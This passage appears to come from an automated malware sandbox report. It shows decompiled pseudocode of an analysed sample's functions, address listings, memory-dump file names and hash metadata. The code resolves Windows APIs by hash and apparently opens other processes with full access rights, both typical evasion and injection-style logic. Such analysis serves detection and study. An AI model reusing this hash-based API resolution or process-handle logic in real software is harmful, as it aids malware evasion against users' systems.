								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e8992e3
0x6e8992e7
0x6e8992f3
0x6e8992f7
0x6e8992fb
0x6e899300
0x6e899303
0x6e899305
0x6e899307
0x6e899307
0x6e89930a
0x6e899310
0x6e899388
0x6e89938c
0x6e89938f
0x6e89938f
0x6e899392
0x00000000
0x6e899392
0x6e899317
0x6e89937f
0x6e899383
0x00000000
0x6e899383
0x6e89931e
0x6e899377
0x6e89937a
0x00000000
0x6e89937a
0x6e899323
0x6e899361
0x6e899368
0x6e89936b
0x6e899334
0x6e899334
0x6e89933a
0x00000000
0x00000000
0x6e89933f
0x6e899359
0x6e89935c
0x00000000
0x6e89935c
0x6e899344
0x00000000
0x6e899346
0x6e89934a
0x6e89934d
0x00000000
0x6e89934d
0x6e899344
0x6e899395
0x6e899395
0x6e899395
0x6e89939e
0x6e8993a7
0x6e8993aa
0x6e8993ad
0x6e8993b0
0x6e8993b3
0x6e8993b9
0x6e8993fb
0x6e8993fe
0x6e8993ff
0x6e899406
0x6e899409
0x6e8993bb
0x6e8993bf
0x6e8993c9
0x6e8993d0
0x6e8993d2
0x6e8993eb
0x6e8993ee
0x6e8993ee
0x6e8993d0
0x6e899411
0x6e899414
0x6e899417
0x6e89941b
0x6e89941f
0x6e899429
0x6e89942d
0x6e899437
0x6e899440
0x6e89944d
0x6e899450
0x6e899453
0x6e899453
0x6e89945f
0x6e89946a
0x6e899470
0x6e899474
0x6e899461
0x6e899461
0x6e899461
0x6e89947c
0x6e8994a6
0x6e8994ac
0x6e8994ac
0x6e8994b4
0x6e89985d
0x6e899863
0x6e899869
0x6e899869
0x00000000
0x6e8994ba
0x6e8994ba
0x6e8994be
0x6e8994c1
0x6e8994c4
0x6e8994c7
0x6e8994cb
0x6e8994cd
0x6e8994d0
0x6e8994d3
0x6e8994d7
0x6e8994dc
0x6e8994df
0x6e8994e3
0x6e8994e8
0x6e8994eb
0x6e8994ed
0x6e8994f0
0x6e8994f4
0x6e8994f9
0x6e899509
0x6e89950f
0x6e89950f
0x6e899517
0x6e899519
0x6e899522
0x6e899524
0x6e899527
0x6e899532
0x6e89955f
0x6e899534
0x6e89954b
0x6e89954b
0x6e899567
0x6e89956d
0x6e899573
0x6e899573
0x6e899567
0x6e899522
0x6e89957a
0x6e8995eb
0x6e8995f0
0x6e899649
0x6e89970b
0x6e899710
0x6e89971f
0x6e899725
0x6e899729
0x6e899732
0x6e899739
0x6e899742
0x6e899750
0x6e899753
0x6e89973b
0x6e89973b
0x6e89973b
0x6e899739
0x6e89975c
0x6e899789
0x6e89979c
0x6e8997a4
0x6e89978b
0x6e89978d
0x6e899795
0x6e899795
0x6e89975e
0x6e899763
0x6e899782
0x6e899765
0x6e89976a
0x6e89977b
0x6e89976c
0x6e89976c
0x6e89976c
0x6e89976a
0x6e899763
0x6e8997ac
0x6e8997bb
0x6e8997c8
0x6e8997d1
0x6e8997d5
0x6e8997d9
0x6e8997dc
0x6e8997df
0x6e8997e2
0x6e8997e5
0x6e8997e8
0x6e8997ee
0x6e8997f2
0x6e8997f8
0x6e8997f8
0x6e8997ee
0x6e8997fe
0x6e89983b
0x6e89983f
0x6e899846
0x6e89984c
0x6e899800
0x6e899803
0x6e899823
0x6e899827
0x6e89982e
0x6e899835
0x6e899805
0x6e899808
0x6e89980a
0x6e89980e
0x6e899818
0x6e89981e
0x6e89981e
0x6e899808
0x6e899803
0x6e899853
0x6e899853
0x6e89986c
0x6e89986c
0x6e899872
0x6e899877
0x6e8998d1
0x6e8998d6
0x6e899915
0x6e89991a
0x6e89991c
0x6e899920
0x6e899923
0x6e899926
0x6e899928
0x6e899929
0x6e899929
0x6e89992e
0x6e89994c
0x6e89994e
0x6e899952
0x6e899958
0x6e89995b
0x6e89995d
0x6e89995e
0x6e89995e
0x00000000
0x6e899930
0x6e899930
0x6e899930
0x6e899934
0x6e89993a
0x6e89993d
0x6e89993f
0x6e899942
0x6e899961
0x6e899961
0x6e899968
0x6e899982
0x6e89996a
0x6e89996a
0x6e899976
0x6e899977
0x6e89997a
0x6e89997a
0x6e899990
0x6e899990
0x6e89992e
0x6e8998db
0x6e8998e9
0x6e899901
0x6e899905
0x6e899908
0x6e89990e
0x6e899912
0x6e899912
0x00000000
0x6e899912
0x6e8998eb
0x6e8998ef
0x6e8998f5
0x6e8998f5
0x6e8998fb
0x00000000
0x6e8998fb
0x6e8998dd
0x6e8998e1
0x00000000
0x6e8998e1
0x6e89987b
0x6e8998a7
0x6e8998bf
0x6e8998c3
0x6e8998c6
0x6e8998c9
0x6e8998cb
0x6e8998ce
0x6e8998a9
0x6e8998a9
0x6e8998ad
0x6e8998b0
0x6e8998b3
0x6e8998b6
0x6e8998b9
0x6e8998b9
0x00000000
0x6e8998a7
0x6e899881
0x00000000
0x00000000
0x6e899887
0x6e89988b
0x6e899891
0x6e899894
0x6e899897
0x6e89989a
0x00000000
0x6e89989a
0x6e899712
0x6e899716
0x6e89971c
0x00000000
0x6e89971c
0x6e899654
0x6e899666
0x6e89966b
0x6e8996d6
0x00000000
0x00000000
0x6e8996dd
0x6e899703
0x6e899707
0x00000000
0x00000000
0x6e8996e6
0x6e8996eb
0x6e8996ff
0x00000000
0x00000000
0x00000000
0x6e899701
0x6e8996f2
0x00000000
0x00000000
0x6e8996f7
0x00000000
0x00000000
0x6e8996f9
0x00000000
0x6e8996dd
0x6e89966d
0x6e899677
0x6e899688
0x6e89968b
0x6e89968e
0x6e899694
0x00000000
0x00000000
0x00000000
0x00000000
0x6e89969a
0x6e89969a
0x6e89969a
0x6e8996a1
0x00000000
0x00000000
0x6e8996a3
0x6e8996a6
0x6e8996ac
0x00000000
0x00000000
0x00000000
0x6e8996ae
0x6e8996b0
0x6e8996b9
0x00000000
0x00000000
0x6e8996cd
0x00000000
0x00000000
0x00000000
0x6e8996cf
0x6e89965b
0x00000000
0x00000000
0x00000000
0x6e899661
0x6e8995f5
0x6e899624
0x6e899625
0x6e89962e
0x00000000
0x6e89963f
0x00000000
0x6e89963f
0x6e8995fc
0x6e8995ff
0x6e899612
0x6e899613
0x6e899617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8995ff
0x6e8995f5
0x6e899581
0x6e8995de
0x6e8995e2
0x6e8995e8
0x00000000
0x6e8995e8
0x6e899583
0x6e899587
0x6e899594
0x6e899598
0x6e8995ae
0x6e8995b6
0x6e89959a
0x6e89959c
0x6e8995a6
0x6e8995a6
0x6e8995bc
0x6e8995c5
0x6e8995dc
0x00000000
0x00000000
0x00000000
0x6e8995dc
0x6e8995c7
0x6e8995c7
0x00000000
0x6e8995bc

Strings

, xrefs: 6E899947

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: ebf7965c4b5000df65d4d5b85ba4b907ddedcffdf0736eb73a5d1140491ca133
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 2322BF3080838A9FD715CF9DC4A136ABBE0BF86304F048C6DE9E55B2D1D7359985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E8884E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E8884E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E6E88B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E6E88F56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E6E88F6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E6E89218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E6E88F558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E6E88F568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E6E88F568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E6E88F558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E6E88F558(_t435, _t451);
										E6E89382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E6E88F568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E6E88F8C4(_t435, E6E88F568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E6E892F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E6E88F558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E6E88F568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E6E88F568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E6E88F558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E6E88F558( *(_t458 + 4), _t453);
										E6E89382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E6E88F568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E6E88F8C4( *(_t458 + 4), E6E88F568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E6E88F558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E6E88F558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E6E892F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E6E88F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E6E88F8C4( *(_t458 + 4), E6E88F568( *_t458) + 4);
										 *(E6E88F558( *(_t458 + 4), E6E88F568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E88F558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E6E88F8C4( *((intOrPtr*)(_t458 + 0x74)), E6E88F568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E6E88F558( *((intOrPtr*)(_t458 + 0x74)), E6E88F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E6E88F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E6E88F6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E6E88F558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E6E88F568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E6E88F568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E6E88F558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E6E88F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E6E89382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E6E88F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E6E88F8C4( *(_t458 + 4), E6E88F568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E88F568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E6E88F568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E6E88F558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E6E88F558(_t324, _t435);
										E6E89382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E6E88F568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E6E88F8C4(_t324, E6E88F568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E88F8C4( *(_t458 + 4), E6E88F568( *_t458) + 4);
								 *(E6E88F558( *(_t458 + 4), E6E88F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E6E88F8C4(_t324, E6E88F568(_t324) + 4);
								 *((intOrPtr*)(E6E88F558(_t324, E6E88F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E6E88F620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E6E88F620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E6E88F558(_t458 + 0x14, 0);
						_t180 = E6E892878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E88F558( *(_t458 + 4), _t316 << 2)));
								_t188 = E6E88F558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E6E88B680(_t458 + 0x34);
								E6E88B680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E6E88CB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E6E88C33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E6E88F8C4(_t458 + 0x14, E6E88F568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E6E88F558(_t458 + 0x14, E6E88F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E6E892F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E6E88F8C4(_t458 + 0x40, E6E88F568(_t458 + 0x3c) + 4);
										 *(E6E88F558(_t458 + 0x40, E6E88F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E6E88CDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E6E88F558( *(_t458 + 4), _t437 * 4);
												_t212 = E6E88F558(_t458 + 0x40, _t437 * 4);
												E6E888C14( *_t211, E6E89034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E6E88CDE0(_t458 + 0x4c, __eflags);
						L59:
						E6E88B680(_t458 + 0x34);
						E6E88B680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x6e8884e4
0x6e8884e8
0x6e8884f1
0x6e8884f7
0x6e8884fb
0x6e8884ff
0x6e88850a
0x6e88850e
0x6e888513
0x6e88851b
0x6e88852b
0x00000000
0x6e88852d
0x6e888535
0x6e88853c
0x6e88853c
0x6e888a8f
0x6e888a91
0x6e888ad2
0x6e888ad4
0x6e888ae3
0x6e888aef
0x6e888ad6
0x6e888ade
0x6e888af5
0x6e888afa
0x00000000
0x6e888ae0
0x6e888ae2
0x00000000
0x6e888ae2
0x6e888ade
0x00000000
0x6e888546
0x6e88854a
0x6e88854d
0x6e888553
0x6e888553
0x6e888555
0x6e88855c
0x6e88856a
0x6e88856c
0x6e888570
0x6e888572
0x6e88859e
0x6e8885a2
0x6e8885a7
0x6e8885ac
0x6e8885b0
0x6e8885b4
0x6e8885bb
0x6e8885c0
0x6e8885c2
0x6e888b51
0x6e888b60
0x6e888b7f
0x6e888b84
0x6e888b84
0x6e8885d5
0x6e8885da
0x6e8885de
0x6e8885de
0x6e8885de
0x6e8885ef
0x6e8885f1
0x6e8885f3
0x6e888604
0x6e888604
0x6e888609
0x6e88860e
0x6e888612
0x6e888617
0x6e88861e
0x6e888623
0x6e888625
0x6e888b13
0x6e888b1f
0x6e888b39
0x6e888b3e
0x6e888b3e
0x6e88863b
0x6e888640
0x6e888644
0x6e888644
0x6e888644
0x6e888644
0x6e888647
0x6e888647
0x6e888574
0x6e888576
0x6e888576
0x6e888578
0x6e888584
0x6e88858b
0x6e88858d
0x00000000
0x00000000
0x6e888599
0x6e88859a
0x6e88859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e88859c
0x6e88858f
0x6e888592
0x00000000
0x00000000
0x6e888594
0x6e888592
0x6e888648
0x6e88864c
0x6e88864d
0x6e88864d
0x6e888555
0x6e888655
0x6e88865a
0x6e888660
0x6e888660
0x6e888662
0x6e888669
0x6e888677
0x6e888679
0x6e88867d
0x6e88867f
0x6e888681
0x6e8886bc
0x6e8886cb
0x6e8886cd
0x6e8886cf
0x6e8886ed
0x6e8886ef
0x6e8886f1
0x6e888703
0x6e888721
0x6e88872a
0x6e88872d
0x6e88873b
0x6e88874c
0x6e88876a
0x6e88876c
0x6e888770
0x6e888770
0x6e888770
0x6e8886f1
0x6e888683
0x6e888687
0x6e888687
0x6e88868c
0x6e888693
0x6e8886a2
0x6e8886a9
0x6e8886ab
0x00000000
0x00000000
0x6e8886b7
0x6e8886b8
0x6e8886ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8886ba
0x6e8886ad
0x6e8886b0
0x00000000
0x00000000
0x6e8886b2
0x6e8886b0
0x6e888772
0x6e888772
0x6e888773
0x6e888773
0x6e888662
0x6e888781
0x6e888786
0x6e88878a
0x6e88878e
0x6e888794
0x6e888796
0x6e888798
0x6e8887a2
0x6e8887a2
0x6e8887a4
0x6e8887a7
0x6e8887a9
0x6e8887b1
0x6e8887b8
0x6e8887bc
0x6e8887bf
0x00000000
0x00000000
0x6e8888bb
0x6e8888bc
0x6e8888be
0x00000000
0x00000000
0x00000000
0x6e8888be
0x6e8887c5
0x6e8887c8
0x6e8887d1
0x6e8887d6
0x6e8887d8
0x6e8887e4
0x6e8887e8
0x6e8887ed
0x6e8887f1
0x6e888bce
0x6e888be2
0x6e888c04
0x6e888c09
0x6e888c09
0x6e888807
0x6e88880c
0x6e888810
0x6e888810
0x6e888810
0x6e888810
0x6e888815
0x6e88881a
0x6e88881c
0x6e888820
0x6e888827
0x6e88882c
0x6e88882e
0x6e888b8f
0x6e888b9e
0x6e888bb7
0x6e888bbc
0x6e888bbc
0x6e888841
0x6e888846
0x6e88884a
0x6e88884a
0x6e88884a
0x6e88885c
0x6e88887d
0x6e888885
0x6e888893
0x6e8888b1
0x6e8888b7
0x6e8888b7
0x6e8887c8
0x6e888798
0x6e8888c4
0x6e8888c6
0x6e8888ca
0x6e8888d3
0x6e8888de
0x6e8888e2
0x6e8888eb
0x6e8888f0
0x6e8888f6
0x6e8888f7
0x6e8888fb
0x6e8888ff
0x6e888906
0x6e888908
0x6e888a48
0x6e888a59
0x6e888a60
0x6e888a67
0x6e888a67
0x6e888a6a
0x6e888a6d
0x6e888a70
0x6e888a76
0x00000000
0x6e888a78
0x6e888a78
0x6e888a7b
0x6e888a94
0x6e888aac
0x6e888aaf
0x6e888ab4
0x6e888abe
0x6e888ac1
0x6e888ac4
0x6e888acd
0x00000000
0x00000000
0x00000000
0x6e888a7b
0x00000000
0x6e88890e
0x6e888910
0x6e888910
0x6e888912
0x6e888916
0x6e88891b
0x6e88891d
0x6e888921
0x6e888924
0x6e88892c
0x6e88892e
0x00000000
0x00000000
0x6e888945
0x6e888960
0x6e888962
0x6e888970
0x6e888975
0x6e888977
0x6e888994
0x6e888998
0x6e88899a
0x00000000
0x6e88899c
0x6e88899c
0x6e88899f
0x6e8889c0
0x6e8889df
0x6e8889e5
0x6e8889e8
0x6e8889ed
0x6e8889ee
0x6e8889f5
0x00000000
0x6e8889fb
0x6e8889fd
0x6e8889fd
0x6e8889ff
0x6e888a0b
0x6e888a17
0x6e888a39
0x6e888a3e
0x6e888a3f
0x6e888a3f
0x00000000
0x6e8889ff
0x00000000
0x00000000
0x00000000
0x6e88899f
0x6e888979
0x6e888979
0x6e88897f
0x6e888981
0x6e888982
0x6e888983
0x6e888984
0x6e888988
0x6e88898c
0x6e88898e
0x6e88898f
0x6e88898f
0x00000000
0x6e888977
0x6e8889a5
0x6e888a7d
0x6e888a81
0x6e888a8a
0x00000000
0x6e888a8a
0x00000000
0x6e888908

Strings

, xrefs: 6E888AD6

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
